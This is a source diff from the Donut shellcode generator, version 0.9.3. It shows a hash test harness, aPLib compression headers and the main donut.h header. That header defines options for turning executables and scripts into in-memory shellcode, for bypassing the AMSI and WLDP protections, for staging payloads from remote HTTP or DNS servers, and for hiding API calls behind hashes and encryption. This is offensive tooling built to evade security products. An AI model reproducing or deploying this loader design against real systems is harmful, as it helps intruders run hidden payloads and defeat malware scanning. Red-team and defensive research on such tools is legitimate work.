303 // copy 64-bit IV (just using the speck ciphertext)
304 memcpy(iv.b, cipher64, 8);
305
306 // create vectors
307 for(i=0; i<MARU_MAX_STR; i++) {
308 // generate a random string
309 memset(str, 0, sizeof(str));
310 GenRandomString(str, i);
311
312 // derive a hash for string
313 h.q = maru(str, iv.q);
314
315 printf("{\"%s\", 0x%llX},\n", str, h.q);
316 }
317 }
113318
114319 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
320 int i, equ;
321 w64 p, c, h, iv;
322
323 // copy 64-bit plaintext
324 memcpy(p.b, plain64, 8);
325
326 // encrypt in-place with 128-bit key
327 c.q = speck(key64, p.q);
328 equ = (memcmp(c.b, cipher64, 8)==0);
329 printf("SPECK-64/128 Test : %s\n\n", equ ? "OK" : "FAILED");
330
331 // set iv
332 memcpy(iv.b, cipher64, 8);
333
334 // compare test vectors
335 for(i=0; i<MARU_MAX_STR; i++) {
336 h.q = maru(maru_tv[i].str, iv.q);
337
338 if(maru_tv[i].hash != h.q) {
339 printf("Maru test # %i failed.\n", i);
340 break;
341 }
342 }
343 if(i == MARU_MAX_STR) printf("Maru tests OK\n");
137344 return 0;
138345 }
139346 #endif
img/ST_generate_and_copy.PNG less more
Binary diff not shown
img/ST_generate_and_copy_86.PNG less more
Binary diff not shown
img/ST_inject.PNG less more
Binary diff not shown
img/ST_success.PNG less more
Binary diff not shown
img/detected.png less more
Binary diff not shown
img/donut.PNG less more
Binary diff not shown
img/generate_and_copy.PNG less more
Binary diff not shown
img/iexplore.png less more
Binary diff not shown
+65
-0
include/aplib.h less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * ELF 64-bit format header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef APLIB_H_INCLUDED
12 #define APLIB_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 unsigned int aP_pack(const void *source,
23 void *destination,
24 unsigned int length,
25 void *workmem,
26 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
27 void *cbparam);
28
29 unsigned int aP_workmem_size(unsigned int inputsize);
30
31 unsigned int aP_max_packed_size(unsigned int inputsize);
32
33 unsigned int aP_depack_asm(const void *source, void *destination);
34
35 unsigned int aP_depack_asm_fast(const void *source, void *destination);
36
37 unsigned int aP_depack_asm_safe(const void *source,
38 unsigned int srclen,
39 void *destination,
40 unsigned int dstlen);
41
42 unsigned int aP_crc32(const void *source, unsigned int length);
43
44 unsigned int aPsafe_pack(const void *source,
45 void *destination,
46 unsigned int length,
47 void *workmem,
48 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
49 void *cbparam);
50
51 unsigned int aPsafe_check(const void *source);
52
53 unsigned int aPsafe_get_orig_size(const void *source);
54
55 unsigned int aPsafe_depack(const void *source,
56 unsigned int srclen,
57 void *destination,
58 unsigned int dstlen);
59
60 #ifdef __cplusplus
61 } /* extern "C" */
62 #endif
63
64 #endif /* APLIB_H_INCLUDED */
+30
-0
include/depack.h less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker, header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef DEPACK_H_INCLUDED
12 #define DEPACK_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 /* function prototype */
23 unsigned int aP_depack(const void *source, void *destination);
24
25 #ifdef __cplusplus
26 } /* extern "C" */
27 #endif
28
29 #endif /* DEPACK_H_INCLUDED */
+252
-169
include/donut.h less more
3131 #ifndef DONUT_H
3232 #define DONUT_H
3333
34 #ifdef _MSC_VER
35 #define _CRT_SECURE_NO_WARNINGS
36 #define _CRT_NONSTDC_NO_DEPRECATE
37 #endif
38
3439 #include <stdint.h>
3540 #include <stdio.h>
3641 #include <stdlib.h>
3843 #include <sys/stat.h>
3944 #include <inttypes.h>
4045 #include <fcntl.h>
46 #include <limits.h>
4147
4248 #if defined(_WIN32) || defined(_WIN64)
4349 #define WINDOWS
4450 #include <windows.h>
45 #ifndef PAYLOAD_H
51 #ifndef LOADER_H
4652 #include "mmap.h"
4753 #endif
4854 #if defined(_MSC_VER)
4955 #pragma comment(lib, "advapi32.lib")
56 #pragma comment(lib, "user32.lib")
57 #define strcasecmp stricmp
5058 #endif
5159 #else
5260 #define LINUX
5664 #include "pe.h"
5765 #endif
5866
59 #ifndef PAYLOAD_H
67 #ifndef LOADER_H
6068
6169 #if defined(DEBUG)
6270 #define DPRINT(...) { \
7078
7179 #endif
7280
73 #if !defined(NOCRYPTO)
7481 #include "hash.h" // api hashing
7582 #include "encrypt.h" // symmetric encryption of instance+module
76 #endif
83 #include "format.h" // output format for loader
84 #include "aplib.h" // aPLib compression for both windows + linux
7785
7886 #if !defined(WINDOWS)
7987 #define strnicmp(x,y,z) strncasecmp(x,y,z)
93101 } GUID;
94102 #endif
95103
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
104 #define DONUT_KEY_LEN CIPHER_KEY_LEN
105 #define DONUT_BLK_LEN CIPHER_BLK_LEN
106
107 #define DONUT_ERROR_SUCCESS 0
108 #define DONUT_ERROR_FILE_NOT_FOUND 1
109 #define DONUT_ERROR_FILE_EMPTY 2
110 #define DONUT_ERROR_FILE_ACCESS 3
111 #define DONUT_ERROR_FILE_INVALID 4
112 #define DONUT_ERROR_NET_PARAMS 5
113 #define DONUT_ERROR_NO_MEMORY 6
114 #define DONUT_ERROR_INVALID_ARCH 7
115 #define DONUT_ERROR_INVALID_URL 8
116 #define DONUT_ERROR_URL_LENGTH 9
117 #define DONUT_ERROR_INVALID_PARAMETER 10
118 #define DONUT_ERROR_RANDOM 11
119 #define DONUT_ERROR_DLL_FUNCTION 12
120 #define DONUT_ERROR_ARCH_MISMATCH 13
121 #define DONUT_ERROR_DLL_PARAM 14
122 #define DONUT_ERROR_BYPASS_INVALID 15
123 #define DONUT_ERROR_NORELOC 16
124 #define DONUT_ERROR_INVALID_FORMAT 17
125 #define DONUT_ERROR_INVALID_ENGINE 18
126 #define DONUT_ERROR_COMPRESSION 19
127 #define DONUT_ERROR_INVALID_ENTROPY 20
115128
116129 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
130 #define DONUT_ARCH_ANY -1 // for vbs and js files
131 #define DONUT_ARCH_X86 1 // x86
132 #define DONUT_ARCH_X64 2 // AMD64
133 #define DONUT_ARCH_X84 3 // x86 + AMD64
121134
122135 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
136 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
137 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
138 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
139 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
140 #define DONUT_MODULE_VBS 5 // VBScript
141 #define DONUT_MODULE_JS 6 // JavaScript or JScript
142
143 // format type
144 #define DONUT_FORMAT_BINARY 1
145 #define DONUT_FORMAT_BASE64 2
146 #define DONUT_FORMAT_RUBY 3
147 #define DONUT_FORMAT_C 4
148 #define DONUT_FORMAT_PYTHON 5
149 #define DONUT_FORMAT_POWERSHELL 6
150 #define DONUT_FORMAT_CSHARP 7
151 #define DONUT_FORMAT_HEX 8
152
153 // compression engine
154 #define DONUT_COMPRESS_NONE 1
155 #define DONUT_COMPRESS_APLIB 2
156 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
157 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
158 #define DONUT_COMPRESS_XPRESS_HUFF 5 // COMPRESSION_FORMAT_XPRESS_HUFF
159
160 // entropy level
161 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
162 #define DONUT_ENTROPY_RANDOM 2 // use random names
163 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
164
165 // misc options
166 #define DONUT_OPT_EXIT_THREAD 1 // after the main shellcode ends, return to the caller which eventually calls RtlExitUserThread
167 #define DONUT_OPT_EXIT_PROCESS 2 // after the main shellcode ends, call RtlExitUserProcess to terminate host process
130168
131169 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
170 #define DONUT_INSTANCE_EMBED 1 // Module is embedded
171 #define DONUT_INSTANCE_HTTP 2 // Module is downloaded from remote HTTP/HTTPS server
172 #define DONUT_INSTANCE_DNS 3 // Module is downloaded from remote DNS server
173
174 // AMSI/WLDP level
175 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
176 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
177 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
178
179 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
180 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
181 #define DONUT_MAX_MODNAME 8
182 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
183 #define DONUT_VER_LEN 32
184 #define DONUT_DOMAIN_LEN 8
151185
152186 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153187 #define DONUT_RUNTIME_NET4 "v4.0.30319"
163197 #define COMBASE_DLL "combase.dll"
164198 #define USER32_DLL "user32.dll"
165199 #define SHLWAPI_DLL "shlwapi.dll"
200 #define SHELL32_DLL "shell32.dll"
166201
167202 // Per the ECMA spec, the section data looks like this:
168203 // taken from https://github.com/dotnet/coreclr/
179214 //
180215 typedef struct _file_info_t {
181216 int fd;
182 uint64_t size;
183 uint8_t *map;
217 uint32_t len, zlen;
218 uint8_t *data, *zdata;
184219
185220 // the following are set for unmanaged or .NET PE/DLL files
186221 int type;
194229 } API_IMPORT, *PAPI_IMPORT;
195230
196231 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
232 uint8_t mk[DONUT_KEY_LEN]; // master key
233 uint8_t ctr[DONUT_BLK_LEN]; // counter + nonce
199234 } DONUT_CRYPT, *PDONUT_CRYPT;
200
235
201236 // everything required for a module goes in the following structure
202237 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
238 int type; // EXE/DLL/JS/VBS
239 int thread; // run entrypoint of unmanaged EXE as a thread
240 int compress; // indicates engine used for compression
241
242 char runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
243 char domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
244 char cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
245 char method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
246
247 char param[DONUT_MAX_NAME]; // string parameters for both managed and unmanaged DLL/EXE
248 int unicode; // convert param to unicode for unmanaged DLL function
249
250 char sig[DONUT_SIG_LEN]; // string to verify decryption
251 uint64_t mac; // hash of sig, to verify decryption was ok
252
253 uint32_t zlen; // compressed size of EXE/DLL/JS/VBS file
254 uint32_t len; // real size of EXE/DLL/JS/VBS file
255 uint8_t data[4]; // data of EXE/DLL/JS/VBS file
214256 } DONUT_MODULE, *PDONUT_MODULE;
215257
216258 // everything required for an instance goes into the following structure
217259 typedef struct _DONUT_INSTANCE {
218260 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
261 DONUT_CRYPT key; // decrypts instance if encryption enabled
220262
221263 uint64_t iv; // the 64-bit initial value for maru hash
222264
223265 union {
224266 uint64_t hash[64]; // holds up to 64 api hashes
225267 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
268 // include prototypes only if header included from loader.h
269 #ifdef LOADER_H
228270 struct {
229271 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
272 LoadLibraryA_t LoadLibraryA;
273 GetProcAddress_t GetProcAddress;
274 GetModuleHandleA_t GetModuleHandleA;
275 VirtualAlloc_t VirtualAlloc;
276 VirtualFree_t VirtualFree;
277 VirtualQuery_t VirtualQuery;
278 VirtualProtect_t VirtualProtect;
279 Sleep_t Sleep;
280 MultiByteToWideChar_t MultiByteToWideChar;
281 GetUserDefaultLCID_t GetUserDefaultLCID;
282 WaitForSingleObject_t WaitForSingleObject;
283 CreateThread_t CreateThread;
284 GetThreadContext_t GetThreadContext;
285 GetCurrentThread_t GetCurrentThread;
286
287 // imports from shell32.dll
288 CommandLineToArgvW_t CommandLineToArgvW;
240289
241290 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
291 SafeArrayCreate_t SafeArrayCreate;
292 SafeArrayCreateVector_t SafeArrayCreateVector;
293 SafeArrayPutElement_t SafeArrayPutElement;
294 SafeArrayDestroy_t SafeArrayDestroy;
295 SafeArrayGetLBound_t SafeArrayGetLBound;
296 SafeArrayGetUBound_t SafeArrayGetUBound;
297 SysAllocString_t SysAllocString;
298 SysFreeString_t SysFreeString;
299 LoadTypeLib_t LoadTypeLib;
251300
252301 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
302 InternetCrackUrl_t InternetCrackUrl;
303 InternetOpen_t InternetOpen;
304 InternetConnect_t InternetConnect;
305 InternetSetOption_t InternetSetOption;
306 InternetReadFile_t InternetReadFile;
307 InternetCloseHandle_t InternetCloseHandle;
308 HttpOpenRequest_t HttpOpenRequest;
309 HttpSendRequest_t HttpSendRequest;
310 HttpQueryInfo_t HttpQueryInfo;
262311
263312 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
313 CorBindToRuntime_t CorBindToRuntime;
314 CLRCreateInstance_t CLRCreateInstance;
266315
267316 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
317 CoInitializeEx_t CoInitializeEx;
318 CoCreateInstance_t CoCreateInstance;
319 CoUninitialize_t CoUninitialize;
320
321 // imports from ntdll.dll
322 RtlEqualUnicodeString_t RtlEqualUnicodeString;
323 RtlEqualString_t RtlEqualString;
324 RtlUnicodeStringToAnsiString_t RtlUnicodeStringToAnsiString;
325 RtlInitUnicodeString_t RtlInitUnicodeString;
326 RtlExitUserThread_t RtlExitUserThread;
327 RtlExitUserProcess_t RtlExitUserProcess;
328 RtlCreateUnicodeString_t RtlCreateUnicodeString;
329 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
330 RtlDecompressBufferEx_t RtlDecompressBufferEx;
331 NtContinue_t NtContinue;
332 // RtlFreeUnicodeString_t RtlFreeUnicodeString;
333 // RtlFreeString_t RtlFreeString;
271334 };
272335 #endif
273336 } api;
274337
338 int exit_opt; // 1 to call RtlExitUserProcess and terminate the host process
339 int entropy; // indicates entropy level
340 uint64_t oep; // original entrypoint
341
275342 // everything from here is encrypted
276343 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
344 char dll_names[DONUT_MAX_NAME]; // a list of DLL strings to load, separated by semi-colon
345
346 char dataname[8]; // ".data"
347 char kernelbase[12]; // "kernelbase"
348 char amsi[8]; // "amsi"
349 char clr[4]; // "clr"
350 char wldp[8]; // "wldp"
351
352 char cmd_syms[DONUT_MAX_NAME]; // symbols related to command line
353 char exit_api[DONUT_MAX_NAME]; // exit-related API
284354
285355 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
288356 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289357 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290358 char amsiInit[16]; // AmsiInitialize
291359 char amsiScanBuf[16]; // AmsiScanBuffer
292360 char amsiScanStr[16]; // AmsiScanString
293361
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
362 char wscript[8]; // WScript
363 char wscript_exe[12]; // wscript.exe
364
365 GUID xIID_IUnknown;
366 GUID xIID_IDispatch;
299367
300368 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
369 GUID xCLSID_CLRMetaHost;
370 GUID xIID_ICLRMetaHost;
371 GUID xIID_ICLRRuntimeInfo;
372 GUID xCLSID_CorRuntimeHost;
373 GUID xIID_ICorRuntimeHost;
374 GUID xIID_AppDomain;
307375
308376 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
377 GUID xCLSID_ScriptLanguage; // vbs or js
378 GUID xIID_IHost; // wscript object
379 GUID xIID_IActiveScript; // engine
380 GUID xIID_IActiveScriptSite; // implementation
381 GUID xIID_IActiveScriptSiteWindow; // basic GUI stuff
382 GUID xIID_IActiveScriptParse32; // parser
383 GUID xIID_IActiveScriptParse64;
384
385 int type; // DONUT_INSTANCE_EMBED, DONUT_INSTANCE_HTTP
386 char server[DONUT_MAX_NAME]; // staging server hosting donut module
387 char http_req[8]; // just a buffer for "GET"
388
389 uint8_t sig[DONUT_MAX_NAME]; // string to hash
390 uint64_t mac; // to verify decryption ok
330391
331392 DONUT_CRYPT mod_key; // used to decrypt module
332393 uint64_t mod_len; // total size of module
333394
334395 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
396 PDONUT_MODULE p; // Memory allocated for module downloaded via DNS or HTTP
397 DONUT_MODULE x; // Module is embedded
337398 } module;
338399 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339400
340401 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
402 uint32_t len, zlen; // original length of input file and compressed length
403 // general / misc options for loader
404 int arch; // target architecture
405 int bypass; // bypass option for AMSI/WDLP
406 int compress; // engine to use when compressing file via RtlCompressBuffer
407 int entropy; // entropy/encryption level
408 int format; // output format for loader
409 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
410 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
411 uint64_t oep; // original entrypoint of target host file
412
413 // files in/out
414 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
415 char output[DONUT_MAX_NAME]; // name of output file to save loader
416
417 // .NET stuff
418 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
419 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
420 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
421 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
422
423 // command line for DLL/EXE
424 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
425 int unicode; // param is passed to DLL function without converting to unicode
426
427 // HTTP/DNS staging information
428 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote HTTP server or DNS server
429 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
430
431 // DONUT_MODULE
432 int mod_type; // VBS/JS/DLL/EXE
433 int mod_len; // size of DONUT_MODULE
434 DONUT_MODULE *mod; // points to DONUT_MODULE
435
436 // DONUT_INSTANCE
437 int inst_type; // DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP
438 int inst_len; // size of DONUT_INSTANCE
439 DONUT_INSTANCE *inst; // points to DONUT_INSTANCE
440
441 // shellcode generated from configuration
442 int pic_len; // size of loader/shellcode
443 void* pic; // points to loader/shellcode
362444 } DONUT_CONFIG, *PDONUT_CONFIG;
363445
364446 #ifdef __cplusplus
374456 // public functions
375457 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376458 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
459 EXPORT_FUNC const char* DonutError(int);
377460
378461 #ifdef __cplusplus
379462 }
include/donut.ico less more
Binary diff not shown
+23
-0
include/donut.rc less more
0 id ICON "donut.ico"
1
2 1 VERSIONINFO
3 FILEVERSION 0,9,3,0
4 PRODUCTVERSION 0,9,3,0
5 BEGIN
6 BLOCK "StringFileInfo"
7 BEGIN
8 BLOCK "080904E4"
9 BEGIN
10 VALUE "FileDescription", "Donut shellcode generator"
11 VALUE "FileVersion", "0.9.3"
12 VALUE "InternalName", "donut"
13 VALUE "OriginalFilename", "donut.exe"
14 VALUE "ProductName", "Donut"
15 VALUE "ProductVersion", "0.9.3"
16 END
17 END
18 BLOCK "VarFileInfo"
19 BEGIN
20 VALUE "Translation", 0x809, 1252
21 END
22 END
+2
-1
include/encrypt.h less more
3333
3434 #include <stdint.h>
3535 #include <stddef.h>
36 #include <stdio.h>
3637
3738 #ifndef ROTR32
3839 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
4950 extern "C" {
5051 #endif
5152
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len);
5354
5455 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
5556
+53
-0
include/format.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
